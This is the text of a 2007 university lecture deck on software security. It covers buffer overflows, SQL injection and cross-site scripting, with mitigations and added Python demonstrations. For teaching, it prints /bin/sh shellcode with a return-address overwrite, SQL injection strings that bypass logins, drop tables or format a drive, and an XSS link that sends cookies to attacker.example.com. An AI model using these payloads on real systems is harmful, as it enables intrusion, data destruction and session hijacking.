April 26, 2007 Centre College: Software Security
Software Security: Have You Ever Written a Security Bug?
Charles Frank
• Department of Computer Science
• Northern Kentucky University
• http://www.nku.edu/~frank
What We Don’t Know
“Have you ever written a program section with a security hole? How do you know?”
Mark G. Graff & Kenneth R. van Wyk
A Growing Problem
[Chart: Software Vulnerabilities by Year, 1995 to 2006; y-axis: Vulnerabilities, 0 to 9000]
Traditional Security is Reactive
• Perimeter defense (firewalls)
• Intrusion detection
• Over-reliance on cryptography
• Penetrate & patch
• Penetration testing
What is web application security?
It’s more than just cryptography.
– SSL won’t solve all your problems.
It’s more than securing the web server.
– Web applications have their own problems.
It’s more than application firewalls.
– A firewall can’t know every safe action at every possible state in your application.
Firewalls don’t protect web apps
[Diagram: the Web Client sends HTTP traffic on port 80 through the Firewall to the Web Server; the Application on the Web Server talks to the Database Server. The firewall passes the HTTP traffic through untouched.]
Penetrate and Patch
• Discover flaws after deployment, often by attackers.
• Users may not deploy patches.
• Patches may have security flaws (15%?).
• Patches are maps to vulnerabilities: attackers reverse engineer them to create attacks.
The Problem is Software
“We wouldn’t have to spend so much time and effort on network security if we didn’t have such bad software security”
Bruce Schneier, author of “Applied Cryptography” and “Secrets & Lies: Digital Security in a Networked World”
Hackers
“Malicious hackers don’t create security holes; they simply exploit them. Security holes and vulnerabilities – the real root cause of the problem – are the result of bad software design and implementation.”
John Viega & Gary McGraw
Developers Aren’t Ready
“64% of developers are not confident in their ability to write secure applications”
Bill Gates, RSA 2005
Industry Problem
• There is no software liability – no incentive for secure software
• Most developers never learned to produce secure code
• Because of competition and cost considerations, software is produced under severe time constraints.
Developer’s Education
• Most programming courses ignore secure software development
• Most software engineering courses ignore secure software engineering
Complexity
• Software products are growing in size
• Windows XP has 40 million lines of code
• 5-50 bugs per KLOC
• 10% of bugs result in security faults
• 40,000 KLOC * 5 * 10% = 25,000 security bugs
• Software is often written in low level languages such as C/C++
Security Problems
Security Bugs (50%)
• Buffer overflow
• Command injection
• Cross-site scripting
• Integer overflow
• Race condition
• Untrusted input
Architectural Flaws (50%)
• Cryptography misuse
• Lack of compartmentalization
• More privilege than necessary
• Relying on secret algorithms
• Sharing resources
• Usability problems
Essential Facts
• Software Security ≠ Security Features
– Cryptography will not make you secure.
– Application firewalls will not provide security.
• 50/50 Architecture/Coding Problems
• An Emergent Property of Software
– Like Usability or Reliability
– Not a Feature
Software Security Practices
1. Code Reviews
2. Risk Analysis
3. Penetration Testing
4. Security Testing
5. Abuse Cases
6. Security Operations
[Diagram: these practices (Abuse Cases, Risk Analysis, Code Reviews + Static Analysis, Security Testing, Penetration Testing, Security Operations) placed along the lifecycle phases Requirements, Design, Coding, Testing and Maintenance.]
Software Vulnerabilities
1. Malicious Client
2. Buffer Overflow
3. SQL Injection
4. Cross-site Scripting
5. Format String
6. Race Condition
7. Information Leakage
8. Path Traversal
9. Command Injection
10. Integer Overflow
11. PHP Include
Malicious Client
• Developers can mistakenly trust data from a client in server-side code
• Attackers can take advantage of this trust
• The security tester’s job is to violate the data specifications to find security vulnerabilities
Manipulate Network Requests
• Write a client to send custom requests
– Might modify the client code to send malformed requests
• Use a proxy to receive network traffic from a client and modify it before sending it on to the server.
– Firefox Add-on “Tamper Data”
– WebScarab from OWASP
Tamper Data
• Firefox Browser Add-on
• Google for Tamper Data
• Tools | Tamper Data
Buffer Overflow Topics
1. What is a Buffer Overflow?
2. Buffer Overflow Examples
3. Program Stacks
4. Smashing the Stack
5. Shellcode
6. Mitigations
Buffer Overflows
A program accepts too much input and stores it in a fixed length buffer that’s too small.
char A[8];
short B;
gets(A);
Memory before the call (B holds 3):
A A A A A A A A B B
0 0 0 0 0 0 0 0 0 3
Memory after gets(A) reads the input “overflows” (the ‘s’ and the terminating 0 land in B):
A A A A A A A A B B
o v e r f l o w s 0
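The drawing above can be reproduced without leaving memory Python owns. This is an added example, not from the slides: it lays out the same two variables with ctypes and copies the input "overflows" into A the way gets() would. The struct mirrors the slide's picture rather than a real compiler's stack frame, and the numeric value B ends up with (0x0073 = 115) assumes a little-endian machine such as x86.

```python
import ctypes
import sys

# Mirror of the slide's two neighbouring variables: char A[8] followed by short B.
# A struct is used so the "overflow" stays inside memory Python owns; it reproduces
# the drawing, not the exact frame layout a C compiler would choose.
class Frame(ctypes.Structure):
    _pack_ = 1
    _fields_ = [("A", ctypes.c_char * 8), ("B", ctypes.c_short)]

def snapshot(frame):
    """Return (raw bytes of A, value of B) for inspection."""
    raw_a = ctypes.string_at(ctypes.addressof(frame), 8)
    return raw_a, frame.B

def unchecked_copy(frame, data):
    """Emulate gets(A): copy every input byte plus the terminating NUL into A
    with no check against A's size, so bytes beyond A[7] land in B as on the
    slide. The only clamp is the struct itself, so nothing outside it is touched."""
    payload = data + b"\x00"
    n = min(len(payload), ctypes.sizeof(frame))
    ctypes.memmove(ctypes.addressof(frame), payload, n)
    return n

def run_demo(data=b"overflows"):
    """Set B = 3, overflow A with `data`, and return (before, after) snapshots."""
    frame = Frame()
    frame.B = 3
    before = snapshot(frame)
    unchecked_copy(frame, data)
    after = snapshot(frame)
    return before, after

# What B holds afterwards: the bytes 's' and NUL read back as a native short.
# On little-endian x86 that is 0x0073 == 115; the constant adapts elsewhere.
EXPECTED_B = int.from_bytes(b"s\x00", sys.byteorder, signed=True)

if __name__ == "__main__":
    before, after = run_demo()
    print("before:", before)   # (b'\x00\x00\x00\x00\x00\x00\x00\x00', 3)
    print("after: ", after)    # (b'overflow', 115) on x86
```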
Buffer Overflow Examples
Morris Worm
– Took down most of the Internet in 1988.
– Exploited a buffer overflow in fingerd.
– Subsequent worms used overflow attacks too.
MS07-004: Internet Explorer
– Buffer overflow in VML.
– Allows remote code execution.
– Not the first overflow in IE or other browsers.
Buffer Overflow Example #1
What’s the mistake in this program?
#include <stdio.h>

int main() {
    int array[5] = {1, 2, 3, 4, 5};
    printf("%d\n", array[5]);   /* valid indexes are 0..4 */
    return 0;
}
Program output:
> gcc -o buffer buffer.c
> ./buffer
7077876
Buffer Overflow Example #2
Writing beyond the buffer:
int main() {
    int array[5] = {1, 2, 3, 4, 5};
    int i;
    for (i = 0; i <= 255; ++i)   /* 256 writes into a 5-element array */
        array[i] = 41;
    return 0;
}
Program output:
> gcc -o bufferw bufferw.c
> ./bufferw
Segmentation fault (core dumped)
What happened to our program?
The buffer overflow:
– Overwrote memory beyond the buffer with 41.
– The memory page was not writable by the program.
– The OS terminated the program with a segmentation fault.
Do overflows always produce a crash?
– Most of the time, yes.
– A careful attacker can access valid memory.
Why do programmers keep making the same mistake?
• C/C++ are inherently unsafe.
– No bounds checking.
– Unsafe library functions: strcpy(), sprintf(), gets(), scanf(), etc.
• Java, Python largely immune.
• C/C++ gains performance by not checking.
Stack at Function Start
(higher addresses at the top)
old stack frame
parameter #N
…
parameter #1
return address
old FP          <- Frame Pointer
local vars      <- Stack Pointer
Shellcode
Shellcode is machine code that starts a command shell. With a shell, you can run any command.
Shellcode
Shellcode in C.
#include <unistd.h>

int main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = 0x0;                 /* argv must end with a NULL pointer */
    execve(name[0], name, 0x0);    /* replace this process with a shell */
}
Running the program.
> gcc -ggdb -static -o shell shellcode.c
> ./shell
sh-3.00$ exit
From C to Machine Language
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void main() {
    int *ret;
    ret = (int *)&ret + 2;      /* assumes the return address sits two words above ret */
    (*ret) = (int)shellcode;    /* main returns into the shellcode instead of its caller */
}
> gcc -o testsc2 testsc2.c
> ./testsc2
sh-3.00$ exit
Writing an Exploit
1. Construct shellcode to inject.
2. Find exploitable buffer in a program.
3. Estimate address of buffer.
4. Run program with an input that:
   1. Injects shellcode into stack memory.
   2. Overwrites return address with address of your shellcode.
Compiler Defenses: Canaries
Goal: Detect altered return addresses.
Method: Compiler changes stack layout.
– Adds canary to stack when function called.
– Must overwrite canary to change return addr.
– Checks canary before function returns.
– Terminate program if canary modified.
Canaries are random to prevent guessing.
Visual Studio 2005 and gcc 4.1 use canaries.
Canary Stack Layout
(higher addresses at the top)
old frame
param2
param1
return address
saved EBP
canary value
local vars
Buffer Overflow: Key Points
Buffer overflow attacks.
– C/C++ perform no bounds checking.
– There is no difference between code and data.
– Smashing the stack.
Mitigating buffer overflows.
– Use a language with bounds checking.
– Check your own bounds in C/C++.
– Use safe functions, string libraries.
SQL Injection
1. App sends form to user.
2. Attacker submits form with SQL exploit data.
3. Application builds string with exploit data.
4. Application sends SQL query to DB.
5. DB executes query, including exploit, sends data back to application.
6. Application returns data to user.
[Diagram: Attacker, Firewall, Web Server and DB Server; the login form's User field is filled normally and the Pass field contains ' or 1=1--]
SQL Injection in PHP
$link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: " . mysql_error());
mysql_select_db($DB_DATABASE);
// $username and $password come straight from the request and are interpolated into the SQL text
$query = "select count(*) from users where username = '$username' and password = '$password'";
$result = mysql_query($query);
SQL Metacharacters
' quotes parameters
; separates commands
-- comments
%, _ glob in LIKE clause
%, _, *, +, |, [], () used for regular expressions in SIMILAR TO clause
SQL Injection Attack #1
Unauthorized Access Attempt:
password = ' or 1=1 --
SQL statement becomes:
select count(*) from users where username = 'user' and password = '' or 1=1 --
Checks if password is empty OR 1=1, which is always true, permitting access.
SQL Injection Attack #2
Database Modification Attack:
password = foo'; delete from table users where username like '%
Database executes two SQL statements:
select count(*) from users where username = 'user' and password = 'foo'
delete from table users where username like '%'
Impact of SQL Injection
SELECT SSN FROM USERS WHERE UID='$UID'
Input: 5
Result: Returns info for user with UID 5.
Input: ' OR 1=1--
Result: Returns info for all users.
Input: ' UNION SELECT Field FROM Table WHERE 1=1--
Result: Returns all rows from another table.
Input: ';DROP TABLE USERS--
Result: Deletes the users table.
Input: ';master.dbo.xp_cmdshell 'cmd.exe format c: /q /yes' --
Result: Formats C: drive of database server if you’re running MS SQL Server and extended procedures aren’t disabled.
Solution: Prepared Queries
require_once 'MDB2.php';
$mdb2 =& MDB2::factory($dsn, $options);
if (PEAR::isError($mdb2)) {
    die($mdb2->getMessage());
}
// Placeholders instead of interpolation: the driver binds $username and $password as data
$sql = "SELECT count(*) from users where username = ? and password = ?";
$types = array('text', 'text');
// This query returns a result set, so prepare it with MDB2_PREPARE_RESULT
// (MDB2_PREPARE_MANIP is for INSERT/UPDATE/DELETE statements)
$sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_RESULT);
$data = array($username, $password);
$result = $sth->execute($data);
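To see the vulnerable slide and the fix side by side, here is an added example that is not the deck's PHP: the login query built both ways against a constructed in-memory SQLite table, so the slide's ' or 1=1 -- input can be tried against each. Python's sqlite3 module stands in for MySQL/MDB2, and the plain-text passwords exist only to keep the slide's query shape.

```python
import sqlite3

def make_db():
    """Constructed sample data: two users in an in-memory database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("user", "s3cret"), ("alice", "hunter2")])
    return db

def count_concatenated(db, username, password):
    """The vulnerable pattern from the PHP slide: the user's text is pasted
    straight into the SQL, so quotes and '--' become part of the statement."""
    sql = ("select count(*) from users where username = '%s' "
           "and password = '%s'" % (username, password))
    return db.execute(sql).fetchone()[0]

def count_prepared(db, username, password):
    """The MDB2-style fix: placeholders in the SQL, values bound by the
    driver, so the input is compared as data and never parsed as SQL."""
    sql = "select count(*) from users where username = ? and password = ?"
    return db.execute(sql, (username, password)).fetchone()[0]

def login_allowed(db, username, password, prepared=True):
    """Return True when the row count is non-zero, as the slide's check does."""
    count = count_prepared if prepared else count_concatenated
    return count(db, username, password) > 0

if __name__ == "__main__":
    db = make_db()
    bypass = "' or 1=1 --"          # Attack #1 from the slides
    print("concatenated:", login_allowed(db, "user", bypass, prepared=False))  # True
    print("prepared:    ", login_allowed(db, "user", bypass))                  # False
```

With the concatenated query the WHERE clause becomes `username = 'user' and password = '' or 1=1 --'`, which matches every row; the bound version compares the whole string as a password and matches none.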
Cross Site Scripting Attacks (XSS)
• Run Javascript in the victim’s browser
– <script>alert('XSS');</script>
• Get the user’s cookie for the Web site to display, perhaps revealing the session ID
– <script>alert(document.cookie);</script>
• Steal the cookie and hijack the user’s session
– Craft a request to the attacker’s machine with the cookie as part of the file name, e.g. for an image source.
Reflected XSS Attacks
Server side code takes script in user input and echoes the script back to run on the user machine.
Example
Request:
http://server/search.aspx?keyword=<SCRIPT>alert("Running!")</SCRIPT>
Response page:
<BODY><H1>Search Results</H1>for =<SCRIPT>alert("Running!")</SCRIPT><h2>Sorry, no results were found for.</h2>
Exploiting an XSS Bug
• Attacker must trick the user into running the URL with the query string.
• Send a user an email with a link to a Web site:
http://server/search.aspx?keyword=<SCRIPT>document.location="http://attacker.example.com/default.aspx?%2Bescape(document.cookie);"</SCRIPT>
Anatomy of an XSS Attack
[Diagram with Attacker, User, Web Server and Evil Site:]
1. Login
2. Cookie
3. XSS Attack (from Attacker to User)
4. User clicks on XSS link.
5. XSS URL
6. Page with injected code.
7. Browser runs injected code. Evil Site saves cookie.
8. Attacker uses stolen cookie to hijack user session.
Exploiting POST
<body>
<%
dim strName: strName = Request.Form("myName")
if strName = "" then
%>
<form method="POST" name="myForm">
Name: <input type="text" name="myName">
<input type="submit" value="Submit">
</form></body></html>
<%
Response.End
Else
Response.Write "Hello, " & strName & ". Nice to meet you."
End If
%>
</body>
What should we enter for Name?
<SCRIPT>alert('XSS!')</SCRIPT>
Getting the Victim to Submit Malicious POST
Attackers can trick victims into sending the script data in the POST by hosting the form that asks for the user’s name on the attacker’s Web site. The attacker can pre-populate the Name field with the script that exploits the XSS vulnerability.
Testing
• Save the Web page to your site.
• <form method="POST" name="myForm" action="http://VulnerableWebSite/helloPostDemo.asp">
• <input type="text" name="myName" value="<SCRIPT>alert('Hi!')</SCRIPT>">
Automatically Submitting
<body>
….
<SCRIPT>Form.submit();</SCRIPT>
Persistent XSS Attack
• Put <script>alert('Hi!')</script> into a guestbook entry.
• View the guestbook entries page again.
Stopping XSS Attacks
• Encode HTML of attacker’s input before returning it to the browser.
• Problem: Blogs may want users to use HTML. Block the script tag?
Original Character → HTML Encoded
< → &lt;
> → &gt;
& → &amp;
" → &quot;
Events
• Most tags have events
<INPUT name="txtInput2" type="text" value = ' OurData' onclick=alert('Hi') junk=''>
• When the user clicks on the text box the onclick event will fire.
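An added example, not code from the slides: the encoding table from "Stopping XSS Attacks" as a small Python encoder, applied to the search page from the Reflected XSS slides and to an input tag's value attribute. It goes one step beyond the table by also encoding the single quote, since the injection on the Events slide works by closing a single-quoted value; the function names are my own.

```python
# The table's four substitutions plus the single quote (an addition beyond the
# table: it matters inside attribute values such as the onclick example).
HTML_ENCODINGS = {
    "&": "&amp;",   # encoded too, otherwise encoded text could be re-decoded
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}

def html_encode(text):
    """Replace every HTML metacharacter in `text` with its entity. A single
    pass over the characters, so the '&' one rule emits is never re-encoded."""
    return "".join(HTML_ENCODINGS.get(ch, ch) for ch in text)

def render_search_results(keyword):
    """A safe version of the search.aspx page from the Reflected XSS slides:
    the keyword is encoded before being echoed into the response body."""
    safe = html_encode(keyword)
    return ("<BODY><H1>Search Results</H1>for %s"
            "<h2>Sorry, no results were found for %s.</h2></BODY>" % (safe, safe))

def render_text_input(name, value):
    """An input tag whose value attribute is always double-quoted and encoded,
    so a value can neither close the attribute nor add an onclick= handler."""
    return '<INPUT name="%s" type="text" value="%s">' % (
        html_encode(name), html_encode(value))

if __name__ == "__main__":
    print(render_search_results('<SCRIPT>alert("Running!")</SCRIPT>'))
    print(render_text_input("txtInput2", "' OurData' onclick=alert('Hi') junk='"))
```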
Microsoft ASP.NET
• When ValidateRequest property is enabled, the query string and POST data are inspected.
• Suspicious data, such as <script> and onload=, cause an exception to be thrown.
Identifying XSS Vulnerabilities
1. Identify where user data is supplied.
2. Send valid-looking data to the application.
3. Verify whether any of the data is returned to the Web browser.
4. Find ways to force the victim to send data and have it run as a script on the client machine.
Knowledge
SPI Dynamics White papers
– http://www.spidynamics.com/spilabs/education/whitepapers.html
– Blind SQL Injection
– Cross Site Scripting
OWASP Web Goat
Teaches Web application security through a series of lessons.
http://www.owasp.org/index.php/OWASP_WebGoat_Project
Lesson Plans
http://www.owasp.org/index.php/Lesson_Plans